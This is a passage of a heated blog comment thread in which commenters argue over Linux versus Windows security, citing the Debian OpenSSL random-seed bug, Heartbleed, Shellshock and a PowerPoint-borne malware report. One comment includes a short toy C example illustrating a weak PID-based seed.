    And, you know why? We, the people, have to deal with this untested, undesigned, arbitrary bullshit lacking in security that you incompetent FOSS morons force upon us via Linux web servers.

    Do, please, explain to us all what the “Four Freedoms” mean, when it makes no difference at all whether we examine, modify, etc., the code …

    … Because we have [4-LETTER WORD REMOVED – rp] -all control over the amateur morons who deploy it.

  150. DrLoser says:

    Damaged hardware would have produced the same effect from OpenSSL.

    OK, a completely different thread.

    But I’m still notating this as idiocy #23.

    Carry on, oiaohm, carry on. But if you think that you can get the better of TEG …

    … You’re even more foolish than you constantly appear to be.

  151. DrLoser says:

    Microsoft never had the “monopoly” they claimed. Not on servers, and not on the desktop.

    fwiw, ram, Microsoft never claimed a monopoly on the desktop. The precise phrase was a [M$, natch] computer in every home.

    Ironically, Bill aimed too low. I’ve got three in mine (one desktop, one laptop, one notebook), and there’s only one of me.

    And, lest you think this vast overindulgence is because I am a M$ troll … no, it isn’t.

    As a mere contractor, I never got to share in the freebie Surface goodies or the freebie Lumia goodies.

    The desktop is basically a $300 device that affords me the opportunity to comment on this blog. Oh, and it also lets me play around with proper development systems like Visual Studio. Oh, and … never mind.

    The laptop is a “gift” from work. $1500 worth of muscular Dell crud that my employers hope will encourage me to gift them free hours … yeah, right.

    The notebook is an ex-Linux HP-1000 thing that I’ve tried and failed, multiple times, to resuscitate with Linux. Seems to work perfectly well with Windows 8.

    And I have yet to embark on my next home computer project, which will be to build a $1,000 stonkin’ Windows home server. I have no need for it, any more than Robert has any need for the Beast. But, whatever. Different strokes for different folks.

    And, as for servers? Gates never made that claim. At the time, your typical server cost somewhere upward of $500,000 or so.

    It’s only thanks to Linux cannibalising the *nix server market that NT even got a sliver of a chance to edge in with Windows 2000 Server Edition. And they’ve been building an impressive portfolio of enterprise management systems off the back of that rather weedy offering ever since.

    Linux fans should be proud of their contribution to Microsoft’s bottom line!

  152. That Exploit Guy says:

    Partly not. What the compiler flag did to OpenSSL in the Debian OpenSSL case replicates a real-world possible hardware error. If you look at the Debian OpenSSL package random number generator case, you find the Debian maintainer was very annoyed. OpenSSL was lacking a test suite and also never tested the random number generator before accepting it. Damaged hardware would have produced the same effect from OpenSSL.

    I’ll let famous security expert Bruce Schneier educate you on the Debian OpenSSL vulnerability:

    “The bug in question was caused by the removal of the following line of code from md_rand.c… These lines were removed because they caused the Valgrind and Purify tools to produce warnings about the use of uninitialized data in any code that was linked to OpenSSL. You can see one such report to the OpenSSL team here. Removing this code has the side effect of crippling the seeding process for the OpenSSL PRNG. Instead of mixing in random data for the initial seed, the only “random” value that was used was the current process ID. On the Linux platform, the default maximum process ID is 32,768, resulting in a very small number of seed values being used for all PRNG operations.”

    To put it simply, the vulnerability was caused by some moron removing a reference to the uninitialised buffer buf following what Valgrind and Purify told him. This caused the PRNG to lose all of the entropy buf was meant to provide.

    Contrary to your assertion, the vulnerability has fundamentally nothing to do with hardware whatsoever.
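
    For scale, a toy illustration of how shallow a PID-only seed is; this is not the OpenSSL code, just the same idea reduced to a few lines:

    #include <stdio.h>
    #include <stdlib.h>
    #include <unistd.h>

    int main(void) {
        /* With pid_max at the Linux default of 32,768, this "seed" can
           take at most 32,768 values: roughly 15 bits, not 32. */
        srand((unsigned int) getpid());
        printf("pid %d -> first value %d\n", (int) getpid(), rand());
        return 0;
    }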

    The question is: was the bug detectable, and had suitable auditing been performed? The answer, more often than not, is that not enough auditing is done.

    Then where exactly were the people supposedly “auditing” the code for the Bourne-Again Shell and OpenSSL? Or did they simply “audit” by hooking two tin cans to an ohmmeter?

    We can bet there are many thousands more bugs out there that are 10 years or older that are not known in Windows/Linux and OS X.

    We can also confidently say the same thing about most Linux distros, can’t we?

  153. ram says:

    oiaohm’s comments are basically correct. It should also be noted that organisations trying to corrupt OpenSSL have funding in the BILLIONS of dollars and a staff level of many thousands. You can be absolutely positively sure that companies based in the USA that offer proprietary code have been totally compromised.

    It should also be noted that much of the Linux community have not trusted aspects of OpenSSL, specifically aspects of SSH, for quite some time. They have alternative and much leaner packages. These have been around for quite some time. Hint! Hint!

    Nudge! Nudge!

    Can say no more. If you know what I mean!

  154. oiaohm says:

    That Exploit Guy
    What’s damning about the blunder wasn’t how long the vulnerability had been present but how it had been introduced through one’s complete lack of understanding of the source code.
    Partly not. What the compiler flag did to OpenSSL in the Debian OpenSSL case replicates a real-world possible hardware error. If you look at the Debian OpenSSL package random number generator case, you find the Debian maintainer was very annoyed. OpenSSL was lacking a test suite and also never tested the random number generator before accepting it. Damaged hardware would have produced the same effect from OpenSSL. Think of a random device returning a constant: a broken random-generating device can return a constant, and Linux debugging allows the random number to be set to a constant as well. So something in OpenSSL checking that random was working should have stopped the OpenSSL issue in Debian dead. So the OpenSSL source was defective. Yes, the Debian maintainer and upstream were both guilty.

    Many other cases of hardware faults would have slipped past as well, like a non-ticking clock that was used in a section of its random generation. Also, the OpenSSL documentation about how it sourced random data was incorrect; worse, it never validated any of its sources of randomness before 2008. Debian OpenSSL was a warning bell that the OpenSSL project was under-resourced.

    So in 2008 there was something critically wrong with how the OpenSSL project was operating. Yet it took until 2014 and another issue for companies using OpenSSL to decide it was most likely a very good idea to put more resources in. It’s one thing to say this is bad for Linux; the reality is that is not the story. Why did it take 6 years from a major set of faults being found in something like OpenSSL for companies to decide to send in audit teams? Remember, OpenSSL is used by open-source and closed-source development teams. Both under-reacted.

    That Exploit Guy
    If you are looking for vulnerabilities that have managed to persist for more than ten years, look no further than Shellshock.
    One of the recent RDP bugs in Windows was in the first version of Remote Desktop and every version since, and was only found this year. Lots of bugs manage to persist for years. The question is: was the bug detectable, and had suitable auditing been performed? The answer, more often than not, is that not enough auditing is done. Bad is when they take years to fix while being known. We can bet there are many thousands more bugs out there that are 10 years or older that are not known in Windows/Linux and OS X. We just have not found them yet. The reality, from the way open source is being treated, is we can fairly much bet no one is doing enough auditing.

  155. ram says:

    Two facts should be noted:

    Intel has its own game and is not in bed with Microsoft. Intel is holding at least a flush whereas Microsoft looks like it is holding a pair of twos.

    Microsoft never had the “monopoly” they claimed. Not on servers, and not on the desktop.

  156. That Exploit Guy says:

    The Debian OpenSSL flaw, once it became known, was patched very quickly.

    What’s damning about the blunder wasn’t how long the vulnerability had been present but how it had been introduced through one’s complete lack of understanding of the source code.

    If you are looking for vulnerabilities that have managed to persist for more than ten years, look no further than Shellshock.

  157. oiaohm says:

    DrLoser, Microsoft’s record for a known unpatched exploit is 10 years. The Debian OpenSSL flaw, once it became known, was patched very quickly. Please note there are 3 SSL implementations on Linux: OpenSSL, GnuTLS and Mozilla Network Security Services. Unfortunately, all 3 were under-resourced. BSD is working on adding a 4th implementation.

    DrLoser, under Debian you did have the option not to use OpenSSL; not everything requires it. The problem is you had to know it had a flaw to act. Unfortunately, flaws in GnuTLS had seen it fall out of favor. Yes, you can have a Plan A and a Plan B and still find yourself requiring a Plan C. Hopefully we end up with enough plans to allow temporary removal of defective libraries whenever exploits appear.

    Please note, even though that Debian flaw in OpenSSL was open for 5 years, there is not 1 documented case of it being exploited. Heartbleed appeared in active exploits; this is why it made the news and got a fancy name. The history of remote exploits against RDP, IIS and other parts of Windows has also been ongoing.

    Root kit? Yes, heard of them.
    http://www.microsoft.com/security/portal/mmpc/threat/rootkits.aspx
    Yes, they are a Windows problem just as much as a Linux one. Yes, the first Windows rootkit was in 1999. Windows users talk about viruses and malware. Linux users normally talk about rootkits, because those are the large worry.

  158. DrLoser wrote, ” Why would anybody choose to do that?”

    Uh, the boss distributes an e-mail with the file attached outlining his vision for the company? Four folks in different corners of the world are working on a presentation and each shares with the others his piece of the show? A potential employer asks for a sample of a candidate’s work?

  159. DrLoser says:

    I’d also be fascinated to learn of anybody who is a friend of a friend of a friend who has ever once “downloaded a PowerPoint file.”

    I mean, seriously. Why would anybody choose to do that?

  160. DrLoser says:

    Oh well, back to the infinitely tedious topic of this thread. To quote Robert’s cite:

    The main thing that you have to know is how this malware travels around. It seems that it relies on a Powerpoint file that refers to an .INF file. Of course, the mostly used method for spreading such files around is with a help of misleading emails, so be sure you ignore all of them. Once a malicious Powerpoint file is downloaded onto the system, it pulls in two files that are known as slides.inf and slide1.gif. Once these files are active, they are used to make specific system modifications and install a virus. Note that malware itself is not hiding in this malicious Powerpoint file. It is downloaded latest without any permission asked.

    tl;dr. You actually have to read the email and for some unaccountable reason decide that downloading the attached PowerPoint document is somehow appropriate.

    Look, I’m all for protecting haploid idiots with an IQ in the general vicinity of a gecko here, but … so what?

    Do you get any option with Heartbleed? No, you do not. Do you get any option with Shellshock? No, you do not. Did you get any option with that massive SSL hole in Debian, which went undetected for five years? (“Ooooh! Zero day! Almost as good as FIVE YEARS!“)

    No, no, no, no and no again.

    Try harder, Robert. This is pitiful stuff.

  161. DrLoser says:

    Deaf Guy, no one ever stated that Heathbleed and Shellshock didn’t happen. You are missing the pie for the minutia, that being Win-Dohs always suffers insecurities, etc.

    For once I agree with Dougie here. On a substantially inconsequential note: no one ever stated that Heathbleed and Shellshock didn’t happen. Because “Heathbleed” is not, as might be imagined in Metro DC, the B-Side of a Kate Bush song illustrating menstruation, but is in fact normatively referred to as “Heartbleed.”

    That, btw, is so completely inaccurate that it’s not possible to blame a spell-checker.

    Following on from the inconsequentiality, “happen” is not quite the verb a normal person would use. “Explode” is probably more like it. “Happen” suggests a one-off occurrence. “I just happened to bump into Heathcliff — wait, I mean SchollShrek — the other day.”

    Massive security lapses don’t work that way, Dougie. Massive security lapses have the potential to continue for a very, very long time.

    Have you ever heard of the term “root kit?”

  162. dougman says:

    Deaf Guy, no one ever stated that Heathbleed and Shellshock didn’t happen. You are missing the pie for the minutia, that being Win-Dohs always suffers insecurities, etc. These vulnerability issues have been a recurring theme with M$ since 1995 or earlier; you would think that in 19+ years’ time, they would have been able to squash this.

  163. Deaf Spy wrote, “Ok, let’s pretend Heathbleed and Shellshock never, ever happened. Ah, and the Debian SSL fiasco never happened, too.”

    There really are ~1000 malware for that other OS for every one of GNU/Linux’s problems. I can’t list them all here but here are some doozies… Comparing GNU/Linux’s few problems with those of that other OS is like comparing traffic accidents in my neighbourhood with the battle of Iwo Jima. They are not anywhere close to the same order of magnitude.

  164. Deaf Spy says:

    Ok, let’s pretend Heathbleed and Shellshock never, ever happened. Ah, and the Debian SSL fiasco never happened, too.

  165. matchrocket says:

    Banking with Microsoft’s Windows is like playing Russian Roulette with 5 chambers loaded and 1 empty.

  166. dougman says:

    Win-Doh’s patches cause blue screens, so IT idiots delay implementation until they can fully test.

    http://answers.microsoft.com/en-us/windows/forum/windows_7-windows_update/blue-screen-stop-0x50-after-applying-update/6da4d264-02d8-458e-89e2-a78fe68766fd?page=62

    Windows, so aptly named, is always easily broken, and nothing changes with M$.
